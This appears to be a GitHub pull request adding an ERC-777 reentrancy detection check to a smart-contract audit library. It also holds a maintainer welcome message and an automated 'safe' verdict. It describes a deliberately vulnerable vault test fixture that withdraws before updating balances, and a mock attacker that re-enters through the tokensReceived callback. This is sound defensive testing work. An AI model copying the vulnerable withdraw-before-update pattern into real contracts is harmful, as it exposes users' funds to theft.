feat: add ERC777ReentrancyCheck for tokensReceived reentrancy

[invisiblemonsters]

Summary

Fixes #19 — Add ERC-777 reentrancy detection to the audit checklist.

Changes

• src/checks/ERC777ReentrancyCheck.sol: Abstract check that detects ERC-777 tokensReceived reentrancy by deploying a mock ERC-777 token and an attacker that re-enters from the callback hook
• test/ERC777Reentrancy.t.sol: Test suite with VulnerableERC777Vault fixture (withdraws before balance update — classic 2020 imBTC/Uniswap V1 bug) and a FixedAudit variant proving the check passes when reentrancy is mitigated
• README.md: Added ERC777ReentrancyCheck to checks table and architecture diagram

Acceptance Criteria

• Check compiles; test passes when run against included vulnerable fixture
• Test fails when fixture's nonReentrant guard is removed (demonstrated via withdrawFixed variant)
• Documented in README.md under checks table

References

• OZ IERC777Recipient: https://docs.openzeppelin.com/contracts/5.x/api/token/erc777
• 2020 Uniswap V1 / imBTC post-mortem (same tokensReceived reentrancy class)

[abhicris]

Welcome to kcolbchain, @invisiblemonsters — glad you're here. 🌱

Here's what happens from this PR:

1. Our automated review looks for obvious issues (tests, secrets, size) within a couple of hours.
2. If it's clean and CI passes, we merge without back-and-forth.
3. If we need changes, we'll leave a specific comment — not a generic nit. Push another commit and we re-review.

While you wait:

• Run the repo's tests locally (see the repo README.md).
• Keep the PR scoped to one concern — bigger PRs land slower.
• Don't commit tokens or .env contents.

What happens after your first merge

• You're listed on https://kcolbchain.com/contributors/ (opt-out anytime via data/contributors-optout.txt).
• At 2+ merged PRs you're a Regular; at 5+ you're a Fellow — Fellows are the pool we invite first for paid research, partner-org gigs, and grant-funded work. Details: https://kcolbchain.com/docs/org-contribution-policy.html
• Looking for what to pick up next? https://kcolbchain.com/invitations/ lists open help-wanted / good-first-issue across every kcolbchain repo.

Thanks for writing the code. We're building this to last.

[abhicris]

🤖 Audit verdict: safe

Legitimate audit check library for detecting ERC-777 reentrancy vulnerabilities (imBTC/Uniswap V1 class); intentional vulnerable and fixed test contracts for demonstration; no malicious code, credentials, or logic errors detected.

Audited by the kcolbchain PR pipeline. See pipeline docs.